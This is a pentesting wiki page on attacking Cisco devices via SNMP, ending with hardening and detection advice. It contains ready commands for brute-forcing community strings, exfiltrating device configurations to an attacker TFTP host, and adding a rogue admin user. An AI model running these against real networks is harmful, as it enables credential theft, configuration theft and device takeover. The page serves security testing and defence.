cisco-snmp.md (10339B)
1 --- 2 title: "Cisco SNMP" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-snmp/cisco-snmp.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Cisco SNMP 14 15 ## Pentesting Cisco Networks 16 17 **SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**. 18 19 A classic--yet still extremely effective--attack vector is to **brute-force community strings** in order to elevate from unauthenticated user to device administrator (RW community). 20 A practical tool for this task is **onesixtyone**:<sup>[[8]](#references)</sup> 21 22 ```bash 23 onesixtyone -c community_strings.txt -i targets.txt 24 ``` 25 26 Other fast options are the Nmap NSE script `snmp-brute` or Hydra's SNMP module: 27 28 ```bash 29 nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24 30 hydra -P wordlist.txt -s 161 10.10.10.1 snmp 31 ``` 32 33 For generic OID walking and broader enumeration, see [the main SNMP page](/hacktricks/network-services-pentesting/pentesting-snmp/overview). On Cisco gear, do not stop just because Nmap or Nessus fingerprints the service as `SNMPv3`: pentests routinely find v1/v2c communities and v3 users side by side. 34 35 ### SNMPv3 targets are still worth attacking 36 If the device only exposes SNMPv3, user enumeration and password guessing are still practical. Once you recover a **RW SNMPv3 user**, the same config-copy MIB can be abused to exfiltrate or merge configurations.<sup>[[2]](#references)</sup> 37 38 ```bash 39 # Enumerate SNMPv3 usernames / guess passwords 40 ./snmpwn.rb --hosts targets.txt --users users.txt --passlist passwords.txt --enclist passwords.txt 41 42 # Trigger a Cisco config download over SNMPv3 43 ./config-dump.py -t 192.168.66.1 -a SHA -A 'AuthPass!' -x AES -X 'PrivPass!' -u netmon -s 10.10.14.8 44 ``` 45 46 --- 47 48 ### Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB) 49 If you obtain an **RW community** or **RW SNMPv3 user**, you can copy the running-config/startup-config to a remote server *without CLI access* by abusing the CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`).<sup>[[1]](#references)[[2]](#references)</sup> Classic IOS workflows usually use **TFTP** (and sometimes **RCP**); **SCP** exists on platforms that support the Secure Copy extension. If you need to stand up or enumerate a TFTP service first, check [69 - UDP TFTP](/hacktricks/network-services-pentesting/69-udp-tftp). 50 51 1. **Nmap NSE - `snmp-ios-config`** 52 53 ```bash 54 nmap -sU -p161 --script snmp-ios-config \ 55 --script-args creds.snmp=:private,snmp.version=v2c 192.168.66.1 56 ``` 57 The script automatically orchestrates the copy operation and prints the configuration to stdout. 58 59 2. **Manual `snmpset` sequence** 60 61 ```bash 62 # Copy running-config (4) to a TFTP server (1) using row id 1234 63 snmpset -v2c -c private -m +CISCO-CONFIG-COPY-MIB 192.168.66.1 \ 64 ccCopyProtocol.1234 i 1 \ 65 ccCopySourceFileType.1234 i 4 \ 66 ccCopyDestFileType.1234 i 1 \ 67 ccCopyServerAddress.1234 a 10.10.14.8 \ 68 ccCopyFileName.1234 s backup.cfg \ 69 ccCopyEntryRowStatus.1234 i 4 70 71 # Check state / failure cause and then destroy the row 72 snmpget -v2c -c private -m +CISCO-CONFIG-COPY-MIB 192.168.66.1 \ 73 ccCopyState.1234 ccCopyFailCause.1234 74 snmpset -v2c -c private -m +CISCO-CONFIG-COPY-MIB 192.168.66.1 \ 75 ccCopyEntryRowStatus.1234 i 6 76 ``` 77 Row identifiers are *one-shot*; reuse within five minutes triggers `inconsistentValue` errors. 78 79 The important offensive detail is that **`networkFile -> runningConfig` merges** your file into the live configuration, while **`networkFile -> startupConfig` replaces NVRAM** and should only be used with a full config. That makes `runningConfig` the safer path if your goal is to add a local user, enable SSH, loosen `aaa`, or otherwise obtain a management foothold without clobbering the whole device.<sup>[[1]](#references)</sup> 80 81 Recent tooling automates both the dump and the write-back workflow:<sup>[[3]](#references)</sup> 82 83 ```bash 84 sudo cisco-snmp-pwner dump --listen 10.10.14.8 --target 192.168.66.1 \ 85 --version 2c --communitystring private 86 87 sudo cisco-snmp-pwner add-user --listen 10.10.14.8 --target 192.168.66.1 \ 88 --version 2c --communitystring private \ 89 --username pwned --password 'allYourCisc0AreBelongToUs$' 90 ``` 91 92 --- 93 94 ### Metasploit goodies 95 96 * **`cisco_config_tftp`** - downloads running-config/startup-config via TFTP after abusing the same MIB.<sup>[[2]](#references)</sup> 97 * **`snmp_enum`** - collects device inventory information, VLANs, interface descriptions, ARP tables, etc. 98 99 ```bash 100 use auxiliary/scanner/snmp/cisco_config_tftp 101 set RHOSTS 10.10.100.10 102 set COMMUNITY private 103 set OUTPUTDIR /tmp/cisco-configs 104 run 105 ``` 106 107 --- 108 109 ## Recent Cisco SNMP footguns and vulnerabilities (2024 - 2025) 110 Keeping track of vendor advisories is useful to scope *zero-day-to-n-day* opportunities inside an engagement. The practical takeaway is that **RO communities and v3 users are still valuable**: they can turn into config theft, unauthorized polling from "blocked" sources, forced reloads, or even RCE if additional privilege is already in play.<sup>[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup> 111 112 | Year | CVE | Affected feature | Offensive takeaway | 113 |------|-----|------------------|--------------------| 114 | 2025 | CVE-2025-20352 | SNMP parser / stack overflow | A crafted SNMP packet can turn a stolen **RO community** or valid **v3 user** into authenticated **DoS** and, on IOS XE with additional admin or privilege 15 credentials, **root RCE**. | 115 | 2025 | CVE-2025-20169 to CVE-2025-20176 | Multiple SNMP request parsing bugs | Crafted authenticated requests can still force device reloads across SNMP v1/v2c/v3, which matters whenever you only have telemetry credentials and need an outage window. | 116 | 2025 | CVE-2025-20151 | SNMPv3 configuration persistence | Long `snmp-server user ... access <ACL>` lines can be truncated on reload, leaving the user without the expected ACL and allowing polling from sources that should be denied. | 117 | 2024 | CVE-2024-20373 | IPv4 ACL handling | **Extended named IPv4 ACLs** can appear attached to SNMP while not being enforced at all. If you already know a community or v3 user, "restricted to NMS only" may be false. | 118 119 Exploitability still depends on possessing the community string or v3 credentials in most cases, which is exactly why brute-forcing, trap harvesting, and config theft remain relevant against Cisco devices. 120 121 --- 122 123 ## Hardening & Detection tips 124 125 * Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVEs above). 126 * Prefer **SNMPv3** with `authPriv` over v1/v2c. On IOS XE releases that support SHA-2, use `sha-2 256` (or stronger) rather than the older `sha` keyword, which denotes SHA-1; choose the strongest privacy algorithm supported by both the device and the NMS.<sup>[[9]](#references)</sup> 127 ``` 128 snmp-server group SECURE v3 priv 129 snmp-server user monitor SECURE v3 auth sha-2 256 <authpass> priv aes 256 <privpass> 130 ``` 131 * Bind SNMP to a management VRF and restrict it with a supported ACL type. On releases affected by CVE-2024-20373, extended named IPv4 ACLs could be attached but not enforced; patch the device or use a standard named/numbered ACL until it is fixed.<sup>[[7]](#references)</sup> 132 * If you use SNMPv3 user-level ACLs, validate the serialized `snmp-server user` line after save/reload. Long auth/priv/ACL combinations can exceed the 255-character limit and silently drop the ACL on reboot (CVE-2025-20151). On newer IOS XE releases, re-create those users with type 6 encryption.<sup>[[6]](#references)</sup> 133 * Disable **RW communities**; if operationally required, limit them with ACL and views: 134 `snmp-server community <string> RW 99 view SysView` 135 * If patching lags behind the 2025 parser bugs, use an SNMP view to exclude the advisory-listed OIDs until the device can be upgraded. 136 * Monitor for: 137 - UDP/161 spikes or unexpected sources. 138 - `CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource` events indicating out-of-band config changes. 139 - Outbound TFTP/SCP transfers from infrastructure devices that should not be exporting configs. 140 141 --- 142 143 ## References 144 145 - [1] [Cisco: How To Copy Configurations To and From Cisco Devices Using SNMP](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html) 146 - [2] [TrustedSec: Cisco Hackery - How Cisco Configuration Files Can Help Attackers Enumerate Your Network](https://trustedsec.com/blog/cisco-hackery-configuration-file-download) 147 - [3] [firefart/cisco-snmp-pwner - Tool to dump Cisco device configs via SNMP and/or add new users](https://github.com/firefart/cisco-snmp-pwner) 148 - [4] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability (CVE-2025-20352)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte) 149 - [5] [Cisco Security Advisory: Cisco IOS, IOS XE, and IOS XR Software SNMP Denial of Service Vulnerabilities (CVE-2025-20169 to CVE-2025-20176)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-dos-sdxnSUcW) 150 - [6] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMPv3 Configuration Restriction Vulnerability (CVE-2025-20151)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmpv3-qKEYvzsy) 151 - [7] [Cisco Security Advisory: Cisco IOS and IOS XE Software SNMP IPv4 Access Control List Bypass Vulnerability (CVE-2024-20373)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-uwBXfqww) 152 - [8] [Trail of Bits - onesixtyone](https://github.com/trailofbits/onesixtyone) 153 - [9] [Cisco IOS XE - AES and SHA-2 support for SNMPv3](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/snmp/configuration/xe-17-x/snmp-xe-17-book/nm-snmp-encrypt-snmp-support.html)